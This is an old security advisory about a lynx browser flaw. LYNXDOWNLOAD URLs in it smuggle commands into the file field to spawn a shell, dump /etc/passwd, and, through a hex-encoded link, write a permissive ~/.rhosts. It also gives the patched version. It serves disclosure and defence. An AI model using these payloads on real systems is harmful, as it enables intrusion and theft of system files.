COMMAND

    lynx

SYSTEMS AFFECTED

    Systems running lynx

PROBLEM

    When you  start up  a lynx  client session,  you can  hit "g" (for
    Goto) and then enter the following URL:

        URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
        Enter a filename: /dev/null
        File exists. Overwrite? (y/n) y

    This then gives a  shell on the client  machine on which the  lynx
    process is executing.

    Similarly, you can copy and  inspect arbitrary files on the  local
    system thus:

        LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout
        Enter a filename: /dev/stdout
        File exists. Overwrite? (y/n) y

    This  returns  a  copy  of  the  /etc/password  file to the user's
    browser session.  Normally  this may not be  a problem if you  are
    executing lynx from your local account on your workstation.

    However, if you are running lynx as a captive information  service
    (as  discussed  on  the  lynx  man  page), then this means that an
    attacker can  run arbitrary  commands and  inspect arbitrary files
    on the victim system without  authorization.  Credit goes to  CERT
    and unknown reporter.

    Michal Zalewski added following very big, ugly remote hole:

        <a href="LYNXDOWNLOAD://Method=-1/File=/dev/null`%65%63%68%6f%20%2b%20%2b%3e%7e%2f%2e%72%68%6f%73%74%73%0a`/SugFile=test">
        CLICK HERE</a>

    Href exploit above executes "echo + +>~/.rhosts".

SOLUTION

    The  reporter  suggested  that  disabling  downloads  would  be an
    appropriate workaround.   'rhosts' exploit  is eliminated  in Lynx
    version 2.7.1ac-0.35, released on June 26, 1997.  In Lynx  version
    2.7.1ac-0.35 and  later, the  following message  is displayed when
    you try to  follow a potentially  malicious link like  the one you
    mentioned:

        Alert!: This special URL is not allowed in external documents!